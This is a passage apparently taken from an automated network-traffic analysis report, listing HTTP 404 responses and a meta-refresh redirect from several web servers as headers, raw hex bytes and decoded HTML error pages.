3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 25 Nov 2024 12:56:34 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Mon, 25 Nov 2024 12:56:37 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 38 44 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:57:38 GMTServer: Apache/2.4.56 (Debian)Content-Length: 97Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 2f 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <meta http-equiv="refresh" content="0;url=/" /></head><body></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:57:41 GMTServer: Apache/2.4.56 (Debian)Content-Length: 97Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 2f 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <meta http-equiv="refresh" content="0;url=/" /></head><body></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:57:44 GMTServer: Apache/2.4.56 (Debian)Content-Length: 97Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 2f 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <meta http-equiv="refresh" content="0;url=/" /></head><body></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:57:47 GMTServer: Apache/2.4.56 (Debian)Content-Length: 97Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 2f 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <meta http-equiv="refresh" content="0;url=/" /></head><body></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 12:57:54 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 12:57:57 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 12:58:00 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 12:58:02 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:58:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 